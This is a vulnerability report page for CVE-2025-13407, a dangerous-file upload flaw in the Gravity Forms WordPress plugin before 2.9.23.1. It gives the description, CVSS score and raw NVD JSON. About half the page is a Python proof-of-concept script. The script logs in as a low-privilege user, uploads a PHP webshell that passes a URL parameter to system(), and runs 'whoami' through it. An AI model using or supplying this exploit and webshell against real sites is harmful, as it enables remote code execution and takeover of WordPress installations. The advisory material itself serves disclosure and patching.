Security Vulnerability Report
中文
CVE-2025-13407 CVSS 6.8 MEDIUM

CVE-2025-13407

Published: 2025-12-24 06:15:44
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Gravity Forms WordPress plugin before 2.9.23.1 does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Gravity Forms WordPress Plugin < 2.9.23.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2025-13407 PoC - Gravity Forms Arbitrary File Upload to RCE # Target: WordPress site with vulnerable Gravity Forms plugin < 2.9.23.1 TARGET = "http://target-wordpress-site.com" USERNAME = "attacker" PASSWORD = "password" UPLOAD_PATH = "/wp-content/uploads/gravity_forms/" def get_auth_token(): """Login to WordPress and get authentication cookie""" login_url = f"{TARGET}/wp-login.php" session = requests.Session() login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In' } response = session.post(login_url, data=login_data) if 'wordpress_logged_in' in str(response.cookies): return session return None def upload_php_shell(session): """Upload malicious PHP file via Gravity Forms chunked upload""" upload_url = f"{TARGET}/wp-admin/admin-ajax.php" # PHP webshell content php_shell = b'<?php if(isset($_GET["cmd"])){ system($_GET["cmd"]); } ?>' files = { 'file': ('shell.php', php_shell, 'application/x-php'), 'action': 'gf_chunked_upload', 'form_id': '1' } response = session.post(upload_url, files=files) return response.json() def main(): print("[*] CVE-2025-13407 PoC - Gravity Forms File Upload to RCE") # Step 1: Authenticate print("[*] Authenticating as low-privilege user...") session = get_auth_token() if not session: print("[-] Authentication failed") return print("[+] Authenticated successfully") # Step 2: Upload PHP shell print("[*] Uploading PHP shell...") result = upload_php_shell(session) if 'url' in result: shell_url = result['url'] print(f"[+] Shell uploaded: {shell_url}") # Step 3: Execute RCE print("[*] Testing RCE...") rce_test = session.get(f"{shell_url}?cmd=whoami") if rce_test.status_code == 200: print(f"[+] RCE Successful! Output: {rce_test.text.strip()}") else: print("[-] Upload failed") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-13407", "sourceIdentifier": "[email protected]", "published": "2025-12-24T06:15:43.973", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Forms WordPress plugin before 2.9.23.1 does not properly prevent users from uploading dangerous files through its chunked upload functionality, allowing attackers to upload PHP files to affected sites and achieve Remote Code Execution, granted they can discover or enumerate the upload path."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:N", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.6, "impactScore": 5.2}]}, "references": [{"url": "https://wpscan.com/vulnerability/e09908fb-f5ad-45ca-8698-c0d596fd39cc/", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.